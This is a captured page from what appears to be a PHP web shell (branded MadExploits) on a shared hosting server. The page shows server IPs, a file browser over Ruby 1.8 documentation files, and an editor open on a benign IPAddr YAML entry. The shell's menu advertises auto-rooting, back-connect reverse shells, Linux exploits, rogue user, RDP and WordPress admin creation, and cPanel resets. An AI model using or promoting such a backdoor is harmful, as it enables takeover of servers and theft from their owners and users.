Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
IPAddr /
[ HOME SHELL ]
Name
Size
Permission
Action
%26-i.yaml
242
B
-rw-r--r--
%3c%3c-i.yaml
249
B
-rw-r--r--
%3c%3d%3e-i.yaml
235
B
-rw-r--r--
%3d%3d%3d-i.yaml
223
B
-rw-r--r--
%3d%3d-i.yaml
238
B
-rw-r--r--
%3e%3e-i.yaml
250
B
-rw-r--r--
%7c-i.yaml
241
B
-rw-r--r--
%7e-i.yaml
242
B
-rw-r--r--
_reverse-i.yaml
171
B
-rw-r--r--
_to_string-i.yaml
179
B
-rw-r--r--
addr_mask-i.yaml
177
B
-rw-r--r--
cdesc-IPAddr.yaml
3.3
KB
-rw-r--r--
coerce_other-i.yaml
184
B
-rw-r--r--
hton-i.yaml
260
B
-rw-r--r--
in6_addr-i.yaml
175
B
-rw-r--r--
in_addr-i.yaml
173
B
-rw-r--r--
include%3f-i.yaml
632
B
-rw-r--r--
inspect-i.yaml
332
B
-rw-r--r--
ip6_arpa-i.yaml
271
B
-rw-r--r--
ip6_int-i.yaml
269
B
-rw-r--r--
ipv4%3f-i.yaml
247
B
-rw-r--r--
ipv4_compat%3f-i.yaml
277
B
-rw-r--r--
ipv4_compat-i.yaml
315
B
-rw-r--r--
ipv4_mapped%3f-i.yaml
273
B
-rw-r--r--
ipv4_mapped-i.yaml
311
B
-rw-r--r--
ipv6%3f-i.yaml
247
B
-rw-r--r--
mask%21-i.yaml
171
B
-rw-r--r--
mask-i.yaml
336
B
-rw-r--r--
native-i.yaml
375
B
-rw-r--r--
new-c.yaml
1.19
KB
-rw-r--r--
new_ntoh-c.yaml
303
B
-rw-r--r--
ntop-c.yaml
288
B
-rw-r--r--
reverse-i.yaml
302
B
-rw-r--r--
set-i.yaml
176
B
-rw-r--r--
succ-i.yaml
235
B
-rw-r--r--
to_i-i.yaml
248
B
-rw-r--r--
to_range-i.yaml
254
B
-rw-r--r--
to_s-i.yaml
257
B
-rw-r--r--
to_string-i.yaml
285
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : new-c.yaml
--- !ruby/object:RI::MethodDescription aliases: [] block_params: comment: - !ruby/struct:SM::Flow::P body: Creates a new ipaddr object either from a human readable IP address representation in string, or from a packed in_addr value followed by an address family. - !ruby/struct:SM::Flow::P body: "In the former case, the following are the valid formats that will be recognized: "address", "address/prefixlen" and "address/mask", where IPv6 address may be enclosed in square brackets (`[' and `]'). If a prefixlen or a mask is specified, it returns a masked IP address. Although the address family is determined automatically from a specified string, you can specify one explicitly by the optional second argument." - !ruby/struct:SM::Flow::P body: Otherwise an IP addess is generated from a packed in_addr value and an address family. - !ruby/struct:SM::Flow::P body: The IPAddr class defines many methods and operators, and some of those, such as &, |, include? and ==, accept a string, or a packed in_addr value instead of an IPAddr object. full_name: IPAddr::new is_singleton: true name: new params: (addr = '::', family = Socket::AF_UNSPEC) visibility: public
Close